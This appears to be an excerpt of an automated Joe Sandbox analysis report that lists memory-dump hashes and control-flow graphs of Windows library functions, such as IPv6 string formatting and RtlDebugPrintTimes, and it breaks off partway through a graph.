                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e7a3a2e18ab637a8b73afba74f5a6fa1826a7160754a673887e2389ae12a4a9
                                                        • Instruction ID: 88e89ba5eeda44c53a0b673192b24f82a383f81fc58d13f1535c9479b23f2435
                                                        • Opcode Fuzzy Hash: 1e7a3a2e18ab637a8b73afba74f5a6fa1826a7160754a673887e2389ae12a4a9
                                                        • Instruction Fuzzy Hash: 5D900272242541625545F1588418907400A57E0245795C153E1414950D856A995AE621
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 416e677347882df4e8711e98d438238b02c83c42a15ccb0de73b2584be2212c7
                                                        • Instruction ID: fa2484adedd21a9806909475a4ca3194f703801e4812e37cc5ba7cb4ea844544
                                                        • Opcode Fuzzy Hash: 416e677347882df4e8711e98d438238b02c83c42a15ccb0de73b2584be2212c7
                                                        • Instruction Fuzzy Hash: 4C90027A21350012D180B158941CA0A000947D1206F95D556E0015558DC959896D6321
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cc46b54cc0aa7a4be00b728ed6523345f920fdd4a82c38f4d3c3663763fde73
                                                        • Instruction ID: ea5b298eb0b7d4787eb32822d2c5c804fcb922bfc51664568523db2bf53b583b
                                                        • Opcode Fuzzy Hash: 6cc46b54cc0aa7a4be00b728ed6523345f920fdd4a82c38f4d3c3663763fde73
                                                        • Instruction Fuzzy Hash: A590027220554452D100B558941CE06000947D0209F55D152E1064595EC6798955B131
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59341adabaf30d9843e6886211eddfa2f36f3a228dfec3e9c4babc29121bf5cc
                                                        • Instruction ID: 8c98ebcfa6b0fac8658ca438ff5020c26246b105fbafebeafb290a92cd47bf6b
                                                        • Opcode Fuzzy Hash: 59341adabaf30d9843e6886211eddfa2f36f3a228dfec3e9c4babc29121bf5cc
                                                        • Instruction Fuzzy Hash: 4990027230150013D140B158942CA06400997E1305F55D152E0414554DD959895A6222
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e05b176eb7f38142e9ac85328ce957dc1d7a774a6f57bb78fbf76a2b129cb4f
                                                        • Instruction ID: 9e8c591b7319418a74f5b0c63eca821bd9d9d5ce6e652912a55340ac40a4cdfc
                                                        • Opcode Fuzzy Hash: 9e05b176eb7f38142e9ac85328ce957dc1d7a774a6f57bb78fbf76a2b129cb4f
                                                        • Instruction Fuzzy Hash: E490027220150412D100B598941CA46000947E0305F55D152E5024555FC6A989957131
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f8de91349e9c06a70c29f122773141a0cf643ec670a61743022f55971daf15f
                                                        • Instruction ID: a926cb7feb2563a64474042e12ef75a05d3b78c4c8ae8a9546238e3ea1a89c63
                                                        • Opcode Fuzzy Hash: 9f8de91349e9c06a70c29f122773141a0cf643ec670a61743022f55971daf15f
                                                        • Instruction Fuzzy Hash: 6E90027260550412D140B158942CB06001947D0205F55D152E0024554EC69D8B5976A1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd92a92d7f1e2e73f2ae1383af8ab068795f6d6b0c909625df7b34f24e92f238
                                                        • Instruction ID: 32ebaf21f0988a63849e8384695fd33fffd7945fdd411f861517d1c9b65fa44d
                                                        • Opcode Fuzzy Hash: cd92a92d7f1e2e73f2ae1383af8ab068795f6d6b0c909625df7b34f24e92f238
                                                        • Instruction Fuzzy Hash: C890027220150413D100B158951CB07000947D0205F55D552E0424558ED69A89557121
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea2e196faed3368d7ee6f38f2db033a3356eadefb9099bb5f6b71330c0cb5795
                                                        • Instruction ID: 5ec6fcc784d315fae86ba079c7a82e84f75c95bc50dc6069cbd96d9e9af4296f
                                                        • Opcode Fuzzy Hash: ea2e196faed3368d7ee6f38f2db033a3356eadefb9099bb5f6b71330c0cb5795
                                                        • Instruction Fuzzy Hash: 5190027220158812D110B158C418B4A000947D0305F59C552E4424658E86D989957121
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 28ceccf992bc44209577948fa9517b8cb3136087a1f9639fd1b88206d1156dbe
                                                        • Instruction ID: 836718b21459f51bb46b15d49755cc875133118ffca3cd8ea08ca45697a1077b
                                                        • Opcode Fuzzy Hash: 28ceccf992bc44209577948fa9517b8cb3136087a1f9639fd1b88206d1156dbe
                                                        • Instruction Fuzzy Hash: 6790027220150852D100B1588418F46000947E0305F55C157E0124654E8659C9557521
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cb623a5a12610d22dbea38f9b5330ed650921dd68d9fe1e7050f3517ae17f23
                                                        • Instruction ID: 73def9ca94090813a38e8f1428c3711c3e2d7bd36065150b68b726465fdb9221
                                                        • Opcode Fuzzy Hash: 4cb623a5a12610d22dbea38f9b5330ed650921dd68d9fe1e7050f3517ae17f23
                                                        • Instruction Fuzzy Hash: F190027220150812D104B1588818A86000947D0305F55C152E6024655F96A989957131
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07f3bd043000288bff4acd05f9060ef8683bc879dba185e06b08c968934f3bd0
                                                        • Instruction ID: 104e4c10957d827279a5e22357aef4938987b070189d83d10885143f557ee9b8
                                                        • Opcode Fuzzy Hash: 07f3bd043000288bff4acd05f9060ef8683bc879dba185e06b08c968934f3bd0
                                                        • Instruction Fuzzy Hash: 1490027260550812D150B1588428B46000947D0305F55C152E0024654E87998B5976A1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70b13f3aaec2f74e8b26dbff5b4d2d5337b36de3781c1542c6ee4dfc00a15dea
                                                        • Instruction ID: 9e5c56799ddc05e11b0551a840a08d616757725354bd6ed51d0d9c5519937f55
                                                        • Opcode Fuzzy Hash: 70b13f3aaec2f74e8b26dbff5b4d2d5337b36de3781c1542c6ee4dfc00a15dea
                                                        • Instruction Fuzzy Hash: F590027220150812D180B1588418A4A000947D1305F95C156E0025654ECA598B5D77A1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2829d9c9045e9b60cbc8077f3f764ddb40aee790e42981fad98d6ff73450c303
                                                        • Instruction ID: 068583c79ca6c8ff425b142ed38581c31d9a04c8bcb994bbcde36438fb524b3b
                                                        • Opcode Fuzzy Hash: 2829d9c9045e9b60cbc8077f3f764ddb40aee790e42981fad98d6ff73450c303
                                                        • Instruction Fuzzy Hash: D690027220554852D140B1588418E46001947D0309F55C152E0064694E96698E59B661
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e12d845dec977f4d7a096bcafdb8f997fd23aff7993280884c33f989d40bcc99
                                                        • Instruction ID: 39c617e659709c41470cceb67014a4eb2f1f867f5f2098f783adb804fad65c62
                                                        • Opcode Fuzzy Hash: e12d845dec977f4d7a096bcafdb8f997fd23aff7993280884c33f989d40bcc99
                                                        • Instruction Fuzzy Hash: E39002B2202500134105B1588428A16400E47E0205B55C162E1014590EC56989957125
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 42a5d9aff415fcc0c6476ac974332cccb1392a1fd83db1225dbe79c7b101fd4c
                                                        • Instruction ID: 5f216d561c60bf6bbb786fd37e7ca6062e66d0e300c85286ec0eca9205dd17f7
                                                        • Opcode Fuzzy Hash: 42a5d9aff415fcc0c6476ac974332cccb1392a1fd83db1225dbe79c7b101fd4c
                                                        • Instruction Fuzzy Hash: 209002F2201640A24500F258C418F0A450947E0205B55C157E1054560DC5698955A135
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0241917730ffaaa0b80ee23f30e6f4fb7db1888e41b586963ed94750327657ff
                                                        • Instruction ID: 960ce3afeb61ca76f45fc1bd0944fc3c7dcb80fd7b13d878beb5a6855b898fb4
                                                        • Opcode Fuzzy Hash: 0241917730ffaaa0b80ee23f30e6f4fb7db1888e41b586963ed94750327657ff
                                                        • Instruction Fuzzy Hash: B0900477311500130105F55C471CD07004F47D5355355C173F1015550DD775CD757131
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c97d161ae21029f5696492200823275ee1fe480922723e6ed6a8b7c3010e0da4
                                                        • Instruction ID: 3406de3eaa196dfe478fa9dd008115d91ae990711ab6ff5242ab97b2531c2ab2
                                                        • Opcode Fuzzy Hash: c97d161ae21029f5696492200823275ee1fe480922723e6ed6a8b7c3010e0da4
                                                        • Instruction Fuzzy Hash: 49900276221500120145F558461890B044957D6355395C156F1416590DC66589696321
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction ID: 96bdf4c5a15a2184c05e608c3649470dfb1b527c27b63a8aa1f76c28e0c1bd52
                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction Fuzzy Hash:

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1125 37932890-379328b3 1126 3796a4bc-3796a4c0 1125->1126 1127 379328b9-379328cc 1125->1127 1126->1127 1128 3796a4c6-3796a4ca 1126->1128 1129 379328ce-379328d7 1127->1129 1130 379328dd-379328df 1127->1130 1128->1127 1131 3796a4d0-3796a4d4 1128->1131 1129->1130 1132 3796a57e-3796a585 1129->1132 1133 379328e1-379328e5 1130->1133 1131->1127 1134 3796a4da-3796a4de 1131->1134 1132->1130 1135 379328eb-379328fa 1133->1135 1136 37932988-3793298e 1133->1136 1134->1127 1140 3796a4e4-3796a4eb 1134->1140 1137 37932900-37932905 1135->1137 1138 3796a58a-3796a58d 1135->1138 1139 37932908-3793290c 1136->1139 1137->1139 1138->1139 1139->1133 1141 3793290e-3793291b 1139->1141 1142 3796a564-3796a56c 1140->1142 1143 3796a4ed-3796a4f4 1140->1143 1144 37932921 1141->1144 1145 3796a592-3796a599 1141->1145 1142->1127 1146 3796a572-3796a576 1142->1146 1147 3796a4f6-3796a4fe 1143->1147 1148 3796a50b 1143->1148 1149 37932924-37932926 1144->1149 1157 3796a5a1-3796a5c9 call 37940050 1145->1157 1146->1127 1150 3796a57c call 37940050 1146->1150 1147->1127 1151 3796a504-3796a509 1147->1151 1152 3796a510-3796a536 call 37940050 1148->1152 1154 37932993-37932995 1149->1154 1155 37932928-3793292a 1149->1155 1164 3796a55d-3796a55f 1150->1164 1151->1152 1152->1164 1154->1155 1159 37932997-379329b1 call 37940050 1154->1159 1161 37932946-37932966 call 37940050 1155->1161 1162 3793292c-3793292e 1155->1162 1174 37932969-37932974 1159->1174 1161->1174 1162->1161 1167 37932930-37932944 call 37940050 1162->1167 1171 37932981-37932985 1164->1171 1167->1161 1174->1149 1176 37932976-37932979 1174->1176 1176->1157 1177 3793297f 1176->1177 1177->1171
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: e7e7b28cc4ae74a67fb3dd885002ff966212cc787f8ab41d55b94a63955db87f
                                                        • Instruction ID: 8e901842923af926d41b80969ea2247eb33c8b9f6ad67d5b6e47ddfa1b1d3a2a
                                                        • Opcode Fuzzy Hash: e7e7b28cc4ae74a67fb3dd885002ff966212cc787f8ab41d55b94a63955db87f
                                                        • Instruction Fuzzy Hash: D451F7B5A00216BFEB10DF98C99097EF7BCBB09258B508369E464DB641D774EE40CBE1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1178 379a2410-379a2433 1179 379a2439-379a243d 1178->1179 1180 379a24ec-379a24ff 1178->1180 1179->1180 1181 379a2443-379a2447 1179->1181 1182 379a2513-379a2515 1180->1182 1183 379a2501-379a250a 1180->1183 1181->1180 1184 379a244d-379a2451 1181->1184 1186 379a2517-379a251b 1182->1186 1183->1182 1185 379a250c 1183->1185 1184->1180 1189 379a2457-379a245b 1184->1189 1185->1182 1187 379a2538-379a253e 1186->1187 1188 379a251d-379a252c 1186->1188 1192 379a2543-379a2547 1187->1192 1190 379a252e-379a2536 1188->1190 1191 379a2540 1188->1191 1189->1180 1193 379a2461-379a2468 1189->1193 1190->1192 1191->1192 1192->1186 1194 379a2549-379a2556 1192->1194 1195 379a246a-379a2471 1193->1195 1196 379a24b6-379a24be 1193->1196 1197 379a2558-379a2562 1194->1197 1198 379a2564 1194->1198 1200 379a2473-379a247b 1195->1200 1201 379a2484 1195->1201 1196->1180 1199 379a24c0-379a24c4 1196->1199 1204 379a2567-379a2569 1197->1204 1198->1204 1199->1180 1205 379a24c6-379a24ea call 37940510 1199->1205 1200->1180 1202 379a247d-379a2482 1200->1202 1203 379a2489-379a24ab call 37940510 1201->1203 1202->1203 1216 379a24ae-379a24b1 1203->1216 1207 379a256b-379a256d 1204->1207 1208 379a258d-379a258f 1204->1208 1205->1216 1207->1208 1211 379a256f-379a258b call 37940510 1207->1211 1213 379a25ae-379a25d0 call 37940510 1208->1213 1214 379a2591-379a2593 1208->1214 1224 379a25d3-379a25df 1211->1224 1213->1224 1214->1213 1218 379a2595-379a25ab call 37940510 1214->1218 1221 379a2615-379a2619 1216->1221 1218->1213 1224->1204 1225 379a25e1-379a25e4 1224->1225 1226 379a2613 1225->1226 1227 379a25e6-379a2610 call 37940510 1225->1227 1226->1221 1227->1226
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 7576878433ae0c121c5a5f4d7e77aae2e5becbafeb176e4d1fd18ccbeaea5693
                                                        • Instruction ID: f6e1c573beb506b10444903913a1a2bf18d6939f16850e3ba52fcc4d28f5bc10
                                                        • Opcode Fuzzy Hash: 7576878433ae0c121c5a5f4d7e77aae2e5becbafeb176e4d1fd18ccbeaea5693
                                                        • Instruction Fuzzy Hash: E95137B5A04645AEDB60CF5CC89097FB7FDEF88248B408569E495CB641EA74EA10CB60

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1427 379ca670-379ca6e9 call 37902410 * 2 RtlDebugPrintTimes 1433 379ca89f-379ca8c4 call 379025b0 * 2 call 37934c30 1427->1433 1434 379ca6ef-379ca6fa 1427->1434 1436 379ca6fc-379ca709 1434->1436 1437 379ca724 1434->1437 1439 379ca70f-379ca715 1436->1439 1440 379ca70b-379ca70d 1436->1440 1441 379ca728-379ca734 1437->1441 1443 379ca71b-379ca722 1439->1443 1444 379ca7f3-379ca7f5 1439->1444 1440->1439 1445 379ca741-379ca743 1441->1445 1443->1441 1447 379ca81f-379ca821 1444->1447 1448 379ca745-379ca747 1445->1448 1449 379ca736-379ca73c 1445->1449 1450 379ca755-379ca77d RtlDebugPrintTimes 1447->1450 1451 379ca827-379ca834 1447->1451 1448->1447 1453 379ca74c-379ca750 1449->1453 1454 379ca73e 1449->1454 1450->1433 1463 379ca783-379ca7a0 RtlDebugPrintTimes 1450->1463 1456 379ca85a-379ca866 1451->1456 1457 379ca836-379ca843 1451->1457 1455 379ca86c-379ca86e 1453->1455 1454->1445 1455->1447 1462 379ca87b-379ca87d 1456->1462 1460 379ca84b-379ca851 1457->1460 1461 379ca845-379ca849 1457->1461 1464 379ca96b-379ca96d 1460->1464 1465 379ca857 1460->1465 1461->1460 1466 379ca87f-379ca881 1462->1466 1467 379ca870-379ca876 1462->1467 1463->1433 1475 379ca7a6-379ca7cc RtlDebugPrintTimes 1463->1475 1468 379ca883-379ca889 1464->1468 1465->1456 1466->1468 1469 379ca878 1467->1469 1470 379ca8c7-379ca8cb 1467->1470 1471 379ca88b-379ca89d RtlDebugPrintTimes 1468->1471 1472 379ca8d0-379ca8f4 RtlDebugPrintTimes 1468->1472 1469->1462 1474 379ca99f-379ca9a1 1470->1474 1471->1433 1472->1433 1479 379ca8f6-379ca913 RtlDebugPrintTimes 1472->1479 1475->1433 1480 379ca7d2-379ca7d4 1475->1480 1479->1433 1484 379ca915-379ca944 RtlDebugPrintTimes 1479->1484 1482 379ca7d6-379ca7e3 1480->1482 1483 379ca7f7-379ca80a 1480->1483 1485 379ca7eb-379ca7f1 1482->1485 1486 379ca7e5-379ca7e9 1482->1486 1487 379ca817-379ca819 1483->1487 1484->1433 1493 379ca94a-379ca94c 1484->1493 1485->1444 1485->1483 1486->1485 1488 379ca80c-379ca812 1487->1488 1489 379ca81b-379ca81d 1487->1489 1490 379ca868-379ca86a 1488->1490 1491 379ca814 1488->1491 1489->1447 1490->1455 1491->1487 1494 379ca94e-379ca95b 1493->1494 1495 379ca972-379ca985 1493->1495 1496 379ca95d-379ca961 1494->1496 1497 379ca963-379ca969 1494->1497 1498 379ca992-379ca994 1495->1498 1496->1497 1497->1464 1497->1495 1499 379ca996 1498->1499 1500 379ca987-379ca98d 1498->1500 1499->1466 1501 